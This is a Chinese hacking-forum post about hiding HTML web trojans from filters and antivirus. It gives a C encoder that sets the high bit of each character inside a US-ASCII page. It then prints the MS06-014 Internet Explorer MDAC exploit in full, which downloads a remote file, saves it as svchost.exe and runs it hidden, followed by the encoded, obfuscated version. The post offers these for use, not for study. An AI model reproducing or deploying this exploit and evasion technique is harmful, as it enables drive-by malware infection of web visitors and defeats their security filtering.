html网马通用免杀
到国外几个网站看了几个牛人对这个漏洞的讨论,深有感触,写了个Exp,原理简单,高手飘过........
例子:ascii.exe hack.txt >hack.htm
漏洞与服务器无关、与客户端浏览器有关,当前通吃,是ASCII当然不支持汉字了,得记住哦
*/
#include <stdio.h>
int main(int argc,char** argv)
{
FILE *fp;
char ch;
printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n");
if(argc<2){
printf("\nUsage: \n\t %s srcfile >destfile\n",argv[0]);
return -1;
}
if((fp=fopen(argv[1],"r"))==NULL){
printf("File %s open Error",argv[1]);
return -1;
}//指定编码为US-ASCII是必须的
printf("\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=US-ASCII\" />\n<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>\n</head><body>\n");
while((ch=fgetc(fp))!=EOF){
ch|=0x80; //把7位变成8位,这句话是核心,呵呵
printf("%c",ch);
};
fclose(fp);
printf("\n</body></html>\n");
return -1;
}
_____________________________________________________________________________________
用ms06014做例子,源码如下..............
_____________________________________________________________________________________
<html>
<title>MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)</title>
<script language="VBScript">
on error resume next
shell = "
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi=" Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, shell, False
CAOd.Send
CAO9="svchost.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open",0
</script>
</html>
_____________________________________________________________________________________
加密后ascii.exe ie.htm >a.htm
_____________________________________________________________________________________
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>
</head><body>
艰 繇炀娂糸綮寰陀犐铘弪铄魻砒痨矧弪牗湍撩 义盹翦犆镤鍫砒邈豸轱顮砒痨镩魻ㄍ影董氨穿集糸綮寰娂筱蜷痿犾犷珲徵褰⒅掠泸轲簪緤镱犲蝌矧狉弩蹴鍫铄 婓桢祆牻牏梏麴函 犭犰秭弪 镲珈屦徵弩 镯 屙锂屮澧娪弭犆料銧綘滹沲礤铘 蝈狒迮戾礤铘á镡赍泗ⅸ娒料惝箦袅趑蜷怩翦牏沆狍箝洧瑺 祗殇郝墓睹档董兜脸 蹦碍垢沉 懊按泼补懦盯婓弭躜灬舰滹黝 箦趱蜢饨㈡殪澧婓弭躜煦舰泔瘗 箦趱蜢浣㈠ 簪婓弭躜戾舰忉箦 昧祥舰烷泸矬镦舢赝倘栽孝娪弭犆料錉綘昧香 蝈狒逑怅邈舁昧祥 ⅸ婓弭躜戽舰龄铫婓弭躜扃舰溻 婓弭躜扈舰郁颌婓弭躜扉舰遽恝娒料娼箦趱蜢姒箦趱蜢绂箦趱蜢瑕箦趱蜢閵昧乡矫料鎶箦魻昧厢牻犆料惝泸遽翦镡赍泗 料绗ⅱ 昧厢 鍫綘眾昧翔舰桥寓娒料洚橡孱犆料璎狊桢祆瑺漆祗鍔昧箱 孱鋳昧瞎舰篥汨矬舢屮澧婓弭犆料鉅綘昧香 蝈狒屣怅邈舁⒂泸轲糸铉 殪逵 翦硐怅邈簪 ⅸ婓弭犆料鍫綘昧镶 弭羽邈獒炱镬溴颞博娒料岙镳孱娒料附⒚料岙迈殪湫狒瑷昧厢 料俯 昧戏舰昧镶 蹰熹嗅翳 料猬昧戏 娒料督⒚料惝迈殪湫狒瑷昧箱 料订 昧系舰昧箱 蹰熹嗅翳 料娆昧系 娒料唇⒚料瀹迈殪湫狒瑷昧乡 料穿 昧铣舰昧湘 蹰熹嗅翳 料璎昧洗 娒料步⒚料绠迈殪湫狒瑷昧祥 料畅 昧媳舰昧翔 蹰熹嗅翳 料绗昧媳 娒料敖⒚料楫迈殪湫狒瑷昧想 料癌 昧瞎綘昧镶 蹰熹嗅翳 料瀣昧瞎 昧厢 蜷翦犆料洚蝈箴镱箦嘛澌娒料岙筢鲥麸骈戾犆料宫矈昧厢 祜箦婓弭犆料鍫綘昧香 蝈狒屣怅邈舁⒂桢祆 痧扉汜糸镱 ⅱ 昧襄 桢祆砒邈豸鍫昧瞎 掠 掠 镳孱 皧集筱蜷痿緤集梏盱?
</body></html>